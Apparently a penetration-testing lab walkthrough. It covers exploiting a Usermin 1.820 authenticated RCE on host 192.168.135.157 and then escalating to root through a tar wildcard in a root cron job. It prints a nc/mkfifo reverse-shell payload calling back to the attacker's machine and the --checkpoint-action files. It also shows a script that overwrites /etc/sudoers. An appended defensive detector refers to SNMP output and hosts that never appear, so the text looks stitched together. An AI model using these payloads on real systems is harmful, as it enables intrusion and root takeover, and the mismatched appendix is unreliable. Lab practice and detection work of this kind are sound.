---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Usermin 1.750 - Remote Command Execution (Metasploit) | linux/webapps/46468.rb
Usermin 1.820 - Remote Code Execution (RCE) (Authenticated) | linux/webapps/50234.py
Usermin 2.100 - Username Enumeration | multiple/webapps/52254.py
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | linux/remote/22275.pl
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/2017.pl
Webmin Usermin 2.100 - Username Enumeration | perl/webapps/52114.py
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Downloaded POC
┌──(kali🎃kali)-[~/oscp/157/userminrce]
└─$ searchsploit -m 50234
Exploit: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50234
Path: /usr/share/exploitdb/exploits/linux/webapps/50234.py
Codes: N/A
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/oscp/157/userminrce/50234.py

Executed POC after updating the listen_ip
┌──(kali🎃kali)-[~/oscp/157]
└─$ python 50234.py --host 192.168.135.157 --login cassie --password cassie
/home/kali/oscp/157/50234.py:82: SyntaxWarning: invalid escape sequence '\?'
last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
[+] Target https://192.168.135.157:20000
[+] Login successfully
[+] Setup GnuPG
[+] Payload {'name': '";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.199 1337 >/tmp/f;echo "', 'email': '1337@webmin.com'}
[+] Setup successful
[+] Fetching key list
[+] Key : idx=3\
Traceback (most recent call last):

Successfully established reverse shell connection
┌──(kali🎃kali)-[~/oscp/157]
└─$ rlwrap nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.157] 41580
sh: cannot set terminal process group (1019): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.1$

Read local.txt
sh-5.1$ cat local.txt
cat local.txt
52ceea799729705181436ea3b8f0fabb
sh-5.1$ ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.157 netmask 255.255.255.0 broadcast 192.168.135.255
ether 00:50:56:ab:84:03 txqueuelen 1000 (Ethernet)
RX packets 274061 bytes 24052097 (24.0 MB)
RX errors 0 dropped 1178 overruns 0 frame 0
TX packets 315997 bytes 53660451 (53.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 3760 bytes 270530 (270.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3760 bytes 270530 (270.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Privilege Escalation
Ran linux-smart-enumeration and found a root cron job that runs tar with an unquoted wildcard
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/cron.d/2minutes:*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *

Created files for tar wildcard privilege escalation
cassie@oscp:/opt/admin$ echo "" > '--checkpoint=1'
cassie@oscp:/opt/admin$ echo "" > '--checkpoint-action=exec=sh shell.sh'
cassie@oscp:/opt/admin$ echo "echo 'cassie ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > shell.sh
cassie@oscp:/opt/admin$ ls -l
total 12
-rw-r--r-- 1 cassie cassie 1 Dec 26 17:48 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 cassie cassie 1 Dec 26 17:47 --checkpoint=1
-rw-r--r-- 1 cassie cassie 54 Dec 26 17:51 shell.sh

After a brief wait, the scheduled tar command executed and modified the sudoers file; after that, escalated to root using passwordless sudo
User cassie may run the following commands on oscp:
(root) NOPASSWD: ALL
cassie@oscp:/opt/admin$ sudo su -
sudo su -
root@oscp:~#

Read proof.txt
cat /root/proof.txt
ce856bfe9c26dadac2a32898adf525cd
root@oscp:~# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.157 netmask 255.255.255.0 broadcast 192.168.135.255
ether 00:50:56:ab:84:03 txqueuelen 1000 (Ethernet)
RX packets 278529 bytes 25437073 (25.4 MB)
RX errors 0 dropped 1374 overruns 0 frame 0
TX packets 318780 bytes 54844065 (54.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 4892 bytes 350922 (350.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4892 bytes 350922 (350.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
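Two defender-side checks for the misconfigurations exploited in this writeup, as an added example that is not part of the original lab notes: the NET-SNMP extend entries on Frankfurt that hand a password to anyone who can read the public community, and the root cron job on Charlie that runs tar with an unquoted wildcard. The snmpwalk and cron samples are constructed to match the output shown above with a placeholder password, and the credential regex is a heuristic.

```python
import re
from typing import Dict, List, Tuple

# --- 1. NET-SNMP "extend" entries that hand a credential to any SNMP reader ---
# nsExtend fields that can carry a secret: the command line, its args and output.
SNMP_FIELDS = ("Command", "Args", "Input", "Output1Line", "OutputFull", "OutLine")
SNMP_LINE = re.compile(
    r'nsExtend(?P<field>[A-Za-z0-9]+)\."(?P<name>[^"]+)"(?:\.\d+)?\s*=\s*'
    r'(?:STRING|INTEGER):\s?(?P<value>.*)$'
)
# Heuristic: a "user:secret" fragment or a password-setting tool in the value.
CRED_PATTERN = re.compile(r'\b[A-Za-z0-9_.-]+:[^\s"|\\]{6,}|\bchpasswd\b|\bpasswd\b')

# Constructed sample in the shape of the snmpwalk output above (placeholder password).
SNMPWALK_SAMPLE = r'''NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendCommand."uptime" = STRING: /usr/bin/uptime
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password" = STRING: -c "echo \"jack:EXAMPLE-PASS-1\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendArgs."uptime" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password-cmd" = STRING: "jack:EXAMPLE-PASS-1" | chpasswd
'''


def find_snmp_extend_credentials(walk: str) -> List[Tuple[str, str, str]]:
    """Return (extend name, field, value) for every nsExtend field whose value
    looks like it embeds a credential; review hits by hand, the regex is a heuristic."""
    hits = []
    for line in walk.splitlines():
        m = SNMP_LINE.search(line)
        if not m or m.group("field") not in SNMP_FIELDS:
            continue
        value = m.group("value").strip()
        if CRED_PATTERN.search(value):
            hits.append((m.group("name"), m.group("field"), value))
    return hits


# --- 2. Root cron jobs that run tar with an unquoted wildcard ---
# Line shape as lse prints it: "<file>:<5 schedule fields> <user> <command>";
# the "<file>:" prefix is optional so plain crontab lines parse as well.
CRON_LINE = re.compile(
    r'^(?:(?P<file>[^:\s]+):)?(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$'
)
# A tar command token followed, within the same pipeline stage, by a bare "*".
TAR_WILDCARD = re.compile(r'(?:^|[\s;&|(])tar\s[^;&|]*\s\*(?:\s|$)')
CD_DIR = re.compile(r'\bcd\s+(\S+)')

# Constructed sample: one entry shaped like lse's ret060 finding, two benign ones.
CRON_SAMPLE = """\
# comment lines are skipped
/etc/cron.d/2minutes:*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *
/etc/cron.d/nightly:0 2 * * * root tar -zcf /tmp/backup.tar.gz /opt/admin
/etc/cron.d/cleanup:0 3 * * * root find /tmp/cache -type f -delete
"""


def find_cron_tar_wildcards(cron_lines: List[str]) -> List[Dict[str, str]]:
    """Flag cron entries where tar receives a shell wildcard: file names in the
    working directory are then parsed as tar options, so whoever can write there
    chooses what the cron user executes (tar's --checkpoint-action=exec=...)."""
    findings = []
    for raw in cron_lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m or not TAR_WILDCARD.search(m.group("cmd")):
            continue
        cd = CD_DIR.search(m.group("cmd"))
        findings.append({
            "source": m.group("file") or "crontab",
            "user": m.group("user"),
            "workdir": cd.group(1) if cd else "(cron default)",
            "command": m.group("cmd"),
        })
    return findings


if __name__ == "__main__":
    for hit in find_snmp_extend_credentials(SNMPWALK_SAMPLE):
        print("SNMP extend exposes a credential:", hit)
    for finding in find_cron_tar_wildcards(CRON_SAMPLE.splitlines()):
        print("cron job vulnerable to tar wildcard abuse:", finding)
```

Feed the first function the output of snmpwalk on NET-SNMP-EXTEND-MIB::nsExtendObjects and the second the cron lines lse reports under ret060; either hit is the misconfiguration this chain relied on.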